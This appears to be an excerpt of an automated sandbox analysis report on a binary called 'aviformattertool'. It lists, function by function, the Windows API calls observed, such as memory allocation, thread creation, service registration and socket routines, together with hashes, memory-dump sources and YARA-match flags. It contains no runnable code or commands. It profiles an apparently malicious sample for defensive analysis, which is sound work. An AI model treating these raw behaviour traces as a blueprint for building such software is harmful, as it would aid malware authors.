• Instruction ID: 4c954cae2a3067f42d3b7006341623640c6da45bf1579f3a4cdec85ff5677edd
• Opcode Fuzzy Hash: 52c37f47e2b2ae63367bb402eec93a74e70dc70e372dca8dea6b66cdd5c339eb
• Instruction Fuzzy Hash: D7B01231C48006DB86401710B6180116B707D0C2613340850EC4353010EF224C20C708
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: cc04ed41fe97aa041a251f47938a2406b4d5a5b85fee69cd464d355ff0bb3ea6
• Instruction ID: 813cbd8810634f1c2ffe08aed798b80336a3a6ba53271c94cca51eafd14900a1
• Opcode Fuzzy Hash: cc04ed41fe97aa041a251f47938a2406b4d5a5b85fee69cd464d355ff0bb3ea6
• Instruction Fuzzy Hash: C3B01270A00120CFC700CF64E54861837B0B7043003000365D403E2244C37004028B05
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: 3eb748e00e0c83dace1b992d08d4b535e115f6e75f998ec5999bd22cf4e79796
• Instruction ID: ddd4c4f571a71136cf468c436c137655e454d488334c55525436d6d694ec5319
• Opcode Fuzzy Hash: 3eb748e00e0c83dace1b992d08d4b535e115f6e75f998ec5999bd22cf4e79796
• Instruction Fuzzy Hash: 6A900231059430A6C61056585F1D5256524710537A33503267133600F089740011560E
Uniqueness
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 02A21590: OpenEventA.KERNEL32(00100002,00000000,00000000,56FF5638), ref: 02A21630
  • Part of subcall function 02A21590: CloseHandle.KERNEL32(00000000), ref: 02A21645
  • Part of subcall function 02A21590: ResetEvent.KERNEL32(00000000,56FF5638), ref: 02A2164F
  • Part of subcall function 02A21590: CloseHandle.KERNEL32(00000000,56FF5638), ref: 02A21684
• TlsSetValue.KERNEL32(00000026,?), ref: 02A2212A
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: CloseEventHandle$OpenResetValue
• String ID:
• API String ID: 1556185888-0
• Opcode ID: 2d5a03603b67bae87c181583a1894c57d149a9421d6fe48db6a46491d5ff22d5
• Instruction ID: fff1601a3aa5ec12d99c1506526b6f664d20217e8628ff157ba8e572054f5268
• Opcode Fuzzy Hash: 2d5a03603b67bae87c181583a1894c57d149a9421d6fe48db6a46491d5ff22d5
• Instruction Fuzzy Hash: EB017C75A44218BBD710CF58DD45B5ABBF8FB49B60F104B6AF82593280DB71A9048AA0
Uniqueness
Uniqueness Score: -1.00%
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,0040707C), ref: 0040B837
Memory Dump Source
• Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 779ade60938cffdf9bf70a7663558addcb1eaf0f702dec8a6cf6d7e28e84d4b0
• Instruction ID: c9a81fc2d50226411bfbe9ae5daca65fdbaa1f2bd8fe53d75c828a19bb5c56c5
• Opcode Fuzzy Hash: 779ade60938cffdf9bf70a7663558addcb1eaf0f702dec8a6cf6d7e28e84d4b0
• Instruction Fuzzy Hash: 84E06531645218F7D7145E648C49F927F1EEB59B40F564021B6093B0D192B5A821D6EA
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: e6b7ed8ebc1c2266d08ff008d95ff8a2a734325e0a510ab97eb7a6d027d5ce22
• Instruction ID: 3b0d431550871fc352e63379a435855449a606008958c0ac35ecee8b1464f59e
• Opcode Fuzzy Hash: e6b7ed8ebc1c2266d08ff008d95ff8a2a734325e0a510ab97eb7a6d027d5ce22
• Instruction Fuzzy Hash: EDC04C25888511F7D51537606A1DE6C6624F709304F254177A903700D2577D456776DF
Uniqueness
Uniqueness Score: -1.00%
APIs
• FormatMessageA.KERNEL32(00001200,00000000,?,00000400,?,00000010,00000000), ref: 02A20922
• GetLastError.KERNEL32(?,00000400,?,00000010,00000000), ref: 02A2092A
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
• Opcode ID: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
• Instruction ID: 8c3259de03bfc9704deca1b4382dbd2dbd0885a37c8bcbaed328cd8f2d1c41e7
• Opcode Fuzzy Hash: dd03867116efb9cd43d4c093e92a77269bfb8257ad90c17feacd3712422c3611
• Instruction Fuzzy Hash: 64F05430208341DFEB24CF29C891F2EBBE4ABAD744F54092CF596A2191D770D149CB56
Uniqueness
Uniqueness Score: -1.00%
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,02A24E16,?,?,?,00000000), ref: 02A294AD
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000000), ref: 02A294B6
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: 050dfa6b34015461bd9eed212e66053097083efcc64560e6ab7e755fdfad1902
• Instruction ID: 694cbe827ff705d637b28845a740a15bbec9da6195d9cb490ecd324ee33cd84f
• Opcode Fuzzy Hash: 050dfa6b34015461bd9eed212e66053097083efcc64560e6ab7e755fdfad1902
• Instruction Fuzzy Hash: 9BB0927548420CEBCB012B92EC09B99BF68EB06762F004810F60E440508F7294229AA1
Uniqueness
Uniqueness Score: -1.00%
                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A124E6
                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000001), ref: 02A124FC
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(?), ref: 02A1250E
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(?), ref: 02A1256D
                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,74DEDFB0), ref: 02A1257F
                                                                                                                                                          • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?,74DEDFB0), ref: 02A12599
                                                                                                                                                          • GetLastError.KERNEL32(?,74DEDFB0), ref: 02A125A2
                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 02A125F0
                                                                                                                                                          • InterlockedDecrement.KERNEL32(00000002), ref: 02A1262F
                                                                                                                                                          • InterlockedExchange.KERNEL32(00000000,00000000), ref: 02A1268E
                                                                                                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A12699
                                                                                                                                                          • InterlockedExchange.KERNEL32(00000000,00000001), ref: 02A126AD
                                                                                                                                                          • PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000,00000000,?,74DEDFB0), ref: 02A126BD
                                                                                                                                                          • GetLastError.KERNEL32(?,74DEDFB0), ref: 02A126C7
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Interlocked$Exchange$ErrorLast$CompareCompletionCriticalQueuedSectionStatus$DecrementEnterH_prologLeavePost
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1213838671-0
                                                                                                                                                          • Opcode ID: cd74f582cf7cd6425cf219eb9126dbe096a29f3816ffdeb626e9774d354bd639
                                                                                                                                                          • Instruction ID: dfdd5b32140ed65c9434fca1c60635b250b481445a08066b119ed5a996fe5a70
                                                                                                                                                          • Opcode Fuzzy Hash: cd74f582cf7cd6425cf219eb9126dbe096a29f3816ffdeb626e9774d354bd639
                                                                                                                                                          • Instruction Fuzzy Hash: 79613EB1940219AFCB10DFA4D984AAEFBB9FF09320F104569F916E7240DB34D945CF60
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A1469A
                                                                                                                                                            • Part of subcall function 02A23ACC: _malloc.LIBCMT ref: 02A23AE4
                                                                                                                                                          • htons.WS2_32(?), ref: 02A146FB
                                                                                                                                                          • htonl.WS2_32(?), ref: 02A1471E
                                                                                                                                                          • htonl.WS2_32(00000000), ref: 02A14725
                                                                                                                                                          • htons.WS2_32(00000000), ref: 02A147D9
                                                                                                                                                          • _sprintf.LIBCMT ref: 02A147EF
                                                                                                                                                            • Part of subcall function 02A1890C: _memmove.LIBCMT ref: 02A1892C
                                                                                                                                                          • htons.WS2_32(?), ref: 02A14742
                                                                                                                                                            • Part of subcall function 02A196B7: __EH_prolog.LIBCMT ref: 02A196BC
                                                                                                                                                            • Part of subcall function 02A196B7: RtlEnterCriticalSection.NTDLL(00000020), ref: 02A19737
                                                                                                                                                            • Part of subcall function 02A196B7: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02A19755
                                                                                                                                                            • Part of subcall function 02A11BA7: __EH_prolog.LIBCMT ref: 02A11BAC
                                                                                                                                                            • Part of subcall function 02A11BA7: RtlEnterCriticalSection.NTDLL ref: 02A11BBC
                                                                                                                                                            • Part of subcall function 02A11BA7: RtlLeaveCriticalSection.NTDLL ref: 02A11BEA
                                                                                                                                                            • Part of subcall function 02A11BA7: RtlEnterCriticalSection.NTDLL ref: 02A11C13
                                                                                                                                                            • Part of subcall function 02A11BA7: RtlLeaveCriticalSection.NTDLL ref: 02A11C56
                                                                                                                                                            • Part of subcall function 02A1DE73: __EH_prolog.LIBCMT ref: 02A1DE78
                                                                                                                                                          • htonl.WS2_32(?), ref: 02A14A0E
                                                                                                                                                          • htonl.WS2_32(00000000), ref: 02A14A15
                                                                                                                                                          • htonl.WS2_32(00000000), ref: 02A14A5A
                                                                                                                                                          • htonl.WS2_32(00000000), ref: 02A14A61
                                                                                                                                                          • htons.WS2_32(?), ref: 02A14A81
                                                                                                                                                          • htons.WS2_32(?), ref: 02A14A8B
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSectionhtonl$htons$H_prolog$EnterLeave$_malloc_memmove_sprintf
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1645262487-0
                                                                                                                                                          • Opcode ID: 9089862596572b3c9aa3c1f3e1a394458530601c7b4bc4e39346c684cff706c7
                                                                                                                                                          • Instruction ID: 33586d5447960145ade106c8467a3911691815f19bd7ec6388ad5be0e9b60c03
                                                                                                                                                          • Opcode Fuzzy Hash: 9089862596572b3c9aa3c1f3e1a394458530601c7b4bc4e39346c684cff706c7
                                                                                                                                                          • Instruction Fuzzy Hash: 0F0248B1C40219EEEF15DFE8C944BEEBBB9AF08324F14415AE505A7280DF745A49CFA1
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • RegisterServiceCtrlHandlerA.ADVAPI32(JSON Nested Objects 66,Function_0000235E), ref: 004023C1
                                                                                                                                                          • SetServiceStatus.ADVAPI32(0040A0A8), ref: 00402420
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00402422
                                                                                                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0040242F
                                                                                                                                                          • GetLastError.KERNEL32 ref: 00402450
                                                                                                                                                          • SetServiceStatus.ADVAPI32(0040A0A8), ref: 00402480
                                                                                                                                                          • CreateThread.KERNEL32(00000000,00000000,Function_000022CB,00000000,00000000,00000000), ref: 0040248C
                                                                                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00402495
                                                                                                                                                          • CloseHandle.KERNEL32 ref: 004024A1
                                                                                                                                                          • SetServiceStatus.ADVAPI32(0040A0A8), ref: 004024CA
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Service$Status$CreateErrorLast$CloseCtrlEventHandleHandlerObjectRegisterSingleThreadWait
                                                                                                                                                          • String ID: JSON Nested Objects 66
                                                                                                                                                          • API String ID: 3346042915-4184186574
                                                                                                                                                          • Opcode ID: b8e2ceea582d5224d868d550000be66c6421262dea17db8a57385ad066ca7869
                                                                                                                                                          • Instruction ID: b1e04a5d4e7bd3d275470c836a5b4936d2fee142cab1bdbbff56863c8edf9318
                                                                                                                                                          • Opcode Fuzzy Hash: b8e2ceea582d5224d868d550000be66c6421262dea17db8a57385ad066ca7869
                                                                                                                                                          • Instruction Fuzzy Hash: 4921E470855348AFD2109F16EF48A16BEA9EB95755711413AE105B22B0C7BA0028CF2E
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • RtlDecodePointer.NTDLL(?), ref: 02A282BA
                                                                                                                                                          • _free.LIBCMT ref: 02A282D3
                                                                                                                                                            • Part of subcall function 02A22EF4: HeapFree.KERNEL32(00000000,00000000,?,02A25C52,00000000,?,?,?,00000000,?,02A28937,00000018,02A416B8,00000008,02A28884,?), ref: 02A22F08
                                                                                                                                                            • Part of subcall function 02A22EF4: GetLastError.KERNEL32(00000000,?,02A25C52,00000000,?,?,?,00000000,?,02A28937,00000018,02A416B8,00000008,02A28884,?,?), ref: 02A22F1A
                                                                                                                                                          • _free.LIBCMT ref: 02A282E6
                                                                                                                                                          • _free.LIBCMT ref: 02A28304
                                                                                                                                                          • _free.LIBCMT ref: 02A28316
                                                                                                                                                          • _free.LIBCMT ref: 02A28327
                                                                                                                                                          • _free.LIBCMT ref: 02A28332
                                                                                                                                                          • _free.LIBCMT ref: 02A28356
                                                                                                                                                          • RtlEncodePointer.NTDLL(007DA770), ref: 02A2835D
                                                                                                                                                          • _free.LIBCMT ref: 02A28372
                                                                                                                                                          • _free.LIBCMT ref: 02A28388
                                                                                                                                                          • _free.LIBCMT ref: 02A283B0
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3064303923-0
                                                                                                                                                          • Opcode ID: bbb0b397fb63cc72f4786285d08e272bac2ca8b70c6868d86a89f58dad77fb30
                                                                                                                                                          • Instruction ID: 80fff2ddc6f76dd24aa933946d6af9db352cf5cd995eb9aa4ccbe431e06d97b0
                                                                                                                                                          • Opcode Fuzzy Hash: bbb0b397fb63cc72f4786285d08e272bac2ca8b70c6868d86a89f58dad77fb30
                                                                                                                                                          • Instruction Fuzzy Hash: E421617AD81231CFDB255F1CF9806167BE9BB85B243194869E90457240CF3AEC5EDFA0
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • __EH_prolog.LIBCMT ref: 02A13428
                                                                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32,CancelIoEx), ref: 02A1346B
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 02A13472
                                                                                                                                                          • GetLastError.KERNEL32 ref: 02A13486
                                                                                                                                                          • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 02A134D7
                                                                                                                                                          • RtlEnterCriticalSection.NTDLL(00000018), ref: 02A134ED
                                                                                                                                                          • RtlLeaveCriticalSection.NTDLL(00000018), ref: 02A13518
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
                                                                                                                                                          Yara matches
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                                                                                                          • String ID: CancelIoEx$KERNEL32
                                                                                                                                                          • API String ID: 2902213904-434325024
                                                                                                                                                          • Opcode ID: 6eb37c69467c37ae1534f01a61c800f605833c8fb08a17f16f70f169b2deb834
                                                                                                                                                          • Instruction ID: 2e9487524ffaa8292f54be61ae550b8e2e61b2d97f16fc00ff87f9ff22159326
                                                                                                                                                          • Opcode Fuzzy Hash: 6eb37c69467c37ae1534f01a61c800f605833c8fb08a17f16f70f169b2deb834
                                                                                                                                                          • Instruction Fuzzy Hash: EB3161B5900215DFDF119F68C985A6ABBF9FF49321F044899F9069B240DF70D911CFA1
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404D1D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406530,?,00406580,?,?,?,Runtime Error!Program: ), ref: 00405869
• GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405881
• GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00405892
• GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040589F
Strings
Memory Dump Source
• Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
• API String ID: 2238633743-4044615076
• Opcode ID: 5e55bbd5d9fbbd31eb644cb3db4451ccecd799ed23d920ffe44c979ddb298174
• Instruction ID: 96757171791ba6acfa1a588329da0afe6fa494a71d71fef51203d82f368b70d2
• Opcode Fuzzy Hash: 5e55bbd5d9fbbd31eb644cb3db4451ccecd799ed23d920ffe44c979ddb298174
• Instruction Fuzzy Hash: 92012532600711AFCB11AFB5AD84A1B3FE8EB48750715443AFD05F2291D678D8359F6D
Uniqueness

Uniqueness Score: -1.00%

APIs
• LCMapStringW.KERNEL32(00000000,00000100,004065FC,00000001,00000000,00000000,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405B61
• LCMapStringA.KERNEL32(00000000,00000100,004065F8,00000001,00000000,00000000,?,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405B7D
• LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00404E93,?,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405BC6
• MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405BFE
• MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405C56
• LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405C6C
• LCMapStringW.KERNEL32(00000000,?,00404E93,00000000,00404E93,?,?,00404E93,00200020,00000000,?,00000000), ref: 00405C9F
• LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405D07
Memory Dump Source
• Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
Similarity
• API ID: String$ByteCharMultiWide
• String ID:
• API String ID: 352835431-0
• Opcode ID: 5ddbac4b75e33bff4f019730f37dd77ec854adadffa24fffe04afa75f44fdc89
• Instruction ID: 6c7c4d56f82388bc32b1a747b53f9b53fb7dea99d84d03387e69c39b219b6625
• Opcode Fuzzy Hash: 5ddbac4b75e33bff4f019730f37dd77ec854adadffa24fffe04afa75f44fdc89
• Instruction Fuzzy Hash: FD516931500609AFDF228F94CD45EAF7FB9EB48744F10412AF916B12A0D3399D61DF69
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00404C66
• GetStdHandle.KERNEL32(000000F4,00406530,00000000,?,00000000,00000000), ref: 00404D3C
• WriteFile.KERNEL32(00000000), ref: 00404D43
Strings
Memory Dump Source
• Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
Similarity
• API ID: File$HandleModuleNameWrite
• String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
• API String ID: 3784150691-4022980321
• Opcode ID: 87626977ec5ba82154c16f7a1181adbf3904f853169ea05d33f0388251de275b
• Instruction ID: 15dac176226125f9b152d138cffbac045ff90c6308279214c289240873c3895a
• Opcode Fuzzy Hash: 87626977ec5ba82154c16f7a1181adbf3904f853169ea05d33f0388251de275b
• Instruction Fuzzy Hash: A731C5B2A012186FEF20E761DE49FDA336CEF81304F1105BBF945B61C0E6B89A548A19
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040472B
• GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040473F
• GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040476B
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047A3
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047C5
• FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047DE
• GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 004047F1
• FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040482F
Memory Dump Source
• Source File: 00000003.00000002.2904063884.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.2904063884.0000000000409000.00000040.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_aviformattertool.jbxd
Similarity
• API ID: EnvironmentStrings$ByteCharFreeMultiWide
• String ID:
• API String ID: 1823725401-0
• Opcode ID: 36565b9f5b822e68e5d6287e9a487bd93639a030c9873021641afaf6e7ba0288
• Instruction ID: 43c9d50b8e904b77a3a1cd3ef8b41512f2ebbfa3913c6b8dbecc9c9b9a691504
• Opcode Fuzzy Hash: 36565b9f5b822e68e5d6287e9a487bd93639a030c9873021641afaf6e7ba0288
• Instruction Fuzzy Hash: 0A3102F75442616FD7207FB99C8883BB69CE6C6358712493BFB42F3280D7798C4182A9
Uniqueness

Uniqueness Score: -1.00%

APIs
• OpenEventA.KERNEL32(00100002,00000000,00000000,56FF5638), ref: 02A21630
• CloseHandle.KERNEL32(00000000), ref: 02A21645
• ResetEvent.KERNEL32(00000000,56FF5638), ref: 02A2164F
• CloseHandle.KERNEL32(00000000,56FF5638), ref: 02A21684
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,56FF5638), ref: 02A216FA
• CloseHandle.KERNEL32(00000000), ref: 02A2170F
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: CloseEventHandle$CreateOpenReset
• String ID:
• API String ID: 1285874450-0
• Opcode ID: fd48e11fc1b01db84e2cdd57d950770175878aecc4398780447248d502597290
• Instruction ID: 011f5117e1d0513e2efa118473f1d9395b90714bdd85c58fb240d4d984d39a20
• Opcode Fuzzy Hash: fd48e11fc1b01db84e2cdd57d950770175878aecc4398780447248d502597290
• Instruction Fuzzy Hash: BB414371D04358ABDF20CFA8CD84B9DB7B9EF05724F144619E419EB281EB349909CF90
Uniqueness

Uniqueness Score: -1.00%

APIs
• InterlockedExchange.KERNEL32(?,00000001), ref: 02A120AC
• SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02A120CD
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A120D8
• InterlockedDecrement.KERNEL32(?), ref: 02A1213E
• GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 02A1217A
• InterlockedDecrement.KERNEL32(?), ref: 02A12187
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02A121A6
Memory Dump Source
• Source File: 00000003.00000002.2905199686.0000000002A11000.00000040.00001000.00020000.00000000.sdmp, Offset: 02A11000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2a11000_aviformattertool.jbxd
Yara matches
Similarity
• API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
• String ID:
• API String ID: 1171374749-0
• Opcode ID: 6085df40319ef519dec7674a41cf439196ff2f3f0ef3347741a48efcf55f758f
• Instruction ID: 4d1111f785530566e76b3bdc8b011d39da46a9b878aa473df61f3127a5c8680f
• Opcode Fuzzy Hash: 6085df40319ef519dec7674a41cf439196ff2f3f0ef3347741a48efcf55f758f
• Instruction Fuzzy Hash: 0A4108B15447059FD311DF25D884A6BBBF9FBC8764F144A1EF89A82250DB30E50ACFA2
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 02A21E50: OpenEventA.KERNEL32(00100002,00000000,?,?,?,02A216AE,?,?), ref: 02A21E7F
  • Part of subcall function 02A21E50: CloseHandle.KERNEL32(00000000,?,?,02A216AE,?,?), ref: 02A21E94
  • Part of subcall function 02A21E50: SetEvent.KERNEL32(00000000,02A216AE,?,?), ref: 02A21EA7
• OpenEventA.KERNEL32(00100002,00000000,00000000,56FF5638), ref: 02A21630
• CloseHandle.KERNEL32(00000000), ref: 02A21645
• ResetEvent.KERNEL32(00000000,56FF5638), ref: 02A2164F
• CloseHandle.KERNEL32(00000000,56FF5638), ref: 02A21684
• __CxxThrowException@8.LIBCMT ref: 02A216B5
  • Part of subcall function 02A244DA: RaiseException.KERNEL32(?,?,02A1FADF,?,?,?,?,?,?,?,02A1FADF,?,02A40F68,?), ref: 02A2452F
